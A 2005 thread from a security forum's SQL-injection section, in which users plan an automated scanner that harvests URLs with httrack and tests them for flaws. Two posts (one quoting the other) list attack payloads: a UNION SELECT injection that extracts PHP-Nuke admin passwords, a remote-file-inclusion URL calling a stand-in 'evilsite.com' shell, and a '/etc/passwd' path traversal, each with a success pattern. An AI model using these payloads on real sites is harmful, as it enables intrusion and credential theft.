|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Fri Apr 08, 2005 4:20 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
murdock wrote: | Httrack....very very nice tool
Thanks y3dips!!! |
no problemo dude,
im learning the source too , even till now im still watching HDM script (metasploit) lol
maybe if u already learn some, than u can share it with me |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Fri Apr 08, 2005 7:53 pm |
|
|
murdock |
Advanced user |
|
|
Joined: Mar 16, 2005 |
Posts: 54 |
|
|
|
|
|
|
|
I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange . I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists |
|
|
|
|
|
|
|
|
Posted: Fri Apr 08, 2005 11:59 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
yes, that the point, just save all url cache by httrack n use it for your own sake
yes again, it was written in C ..
even my project will be written in PERL but i trying to understand it n do some porting (if i cant, manybe i just like you, USING compiled command line version )
safe more time for your research , even it not easy to be implemented with our program n will decrease our program time during the 'compiled' program that we use (if we dont implement the source)
|
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sat Apr 09, 2005 4:47 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)
Yeah we have lots of fun. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sun Apr 10, 2005 12:44 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
shai-tan wrote: | Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)
Yeah we have lots of fun. |
woops , what are you type in here shai-tan |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sun Apr 10, 2005 1:53 pm |
|
|
murdock |
Advanced user |
|
|
Joined: Mar 16, 2005 |
Posts: 54 |
|
|
|
|
|
|
|
Shai-tan: It's like where i live, in Spain, with the difference that here sex it's at 15 years and driving at 18.
Y3dips, I have a question for you:
I read the help in the command line version of httrack but it's in complicated english for me and I didn't find how to use the parameters to get what I want, any ideas? Thanks |
|
|
|
|
Posted: Tue Apr 12, 2005 8:20 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
And I can do all those things while on the net. Well except drive. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Fri Apr 15, 2005 12:24 am |
|
|
dairy123 |
Beginner |
|
|
Joined: Feb 13, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
murdock wrote: | I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I 'm reading the source code of the library, but it's in C and....I'm a little lost in C languange . I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutly NO IDEA of GUIs programming in VisualC++, and I need a GUI for making treeviews and itemlists |
Kind of late to this discussion but let me thrown in some ideas too.
I would say not to worry about the UI part yet, first to get the spidering - collection of URLs and arranging them etc to work. I would keep all the components as separate as possible but flexible enough to integrate them with a GUI later on. By components ( they could be as simple as a class file) I mean,
1. the part that fetches the sql injection worthy URLs and keeps them in lists - the spider, url harvester whatever you like to call it
2. the rules loader ( this will be something to help in step 1 ) which has set of rules for a given site or say a type of board - like phpbb, invision etc. Each vulnerability might be potentially written as a rule with a pattern-matching expression ? This will help determine if the URLs are sql-injection worthy (in step 1) or not
3. The actual injector - which sends in actual requests, using post or get -
to the board software - again based on some pre-written rules maybe like generic SQL qury, UNION statements etc.
4. The Interpreter - which in simplest terms is a logger of results returned by the site - (maybe a text dump or a gui based browser window) to display the results gotten from the server. in case the
each of the above components can be as small as possible and can piggy-back already existing scripts like - say the spider piggybacks on httrack - etc.
i know i am talking way over myself but just some ideas |
|
|
|
|
|
|
|
|
Posted: Fri Apr 15, 2005 6:26 pm |
|
|
murdock |
Advanced user |
|
|
Joined: Mar 16, 2005 |
Posts: 54 |
|
|
|
|
|
|
|
Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:
-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)
-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)
These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).
This will make the tool ready to add more exploit tricks easily.
Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks! |
|
|
|
|
|
|
|
|
Posted: Sat Apr 16, 2005 12:57 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
murdock wrote: | Yes dairy123! That's it!
But It will be more simple, imagine a form with 2 textboxs:
-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory transversal test)
-Textbox to insert the "pattern" too see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory transversal worked, "root:" should appear in returnet page!)
These textbox will be free to change but i'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).
This will make the tool ready to add more exploit tricks easily.
Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks! |
hm, i found that there are some equal project we are working
what language are you using for ur project ?
maybe we can share
exploit`s library maybe ?
fyi : * now im focusing on RFI first n im writing an article for echo ezine issue #11 about my project |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sat Apr 16, 2005 1:32 pm |
|
|
murdock |
Advanced user |
|
|
Joined: Mar 16, 2005 |
Posts: 54 |
|
|
|
|
|
|
|
I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips? |
|
|
|
|
Posted: Sun Apr 17, 2005 1:12 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
If I were you I wouldnt use VB Id use PB Pure Basic. Download the Gambas gzip for Linux, compile and use that. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sun Apr 17, 2005 5:48 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
murdock wrote: | I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips? |
im going to using perl,
maybe with LWP module (give some easy way then using socket) |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sun Apr 17, 2005 10:11 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Basic really is for those starting to program. We are lucky we have languages like PHP. I dont like Perl at all. I really like python though. Rather easy. I havent had experience in much programming besides php. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sun Apr 17, 2005 5:00 pm |
|
|
erg0t |
Valuable expert |
|
|
Joined: Apr 08, 2005 |
Posts: 55 |
Location: Uruguay |
|
|
|
|
|
|
In windows you can do GUI very easy, you can do it in C even in assembler, only using resources. You get a resource editor, then you make the GUI in a visual form, save de file, and then when you are going to link the program you make de resource file in.
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 3
Goto page Previous1, 2, 3Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|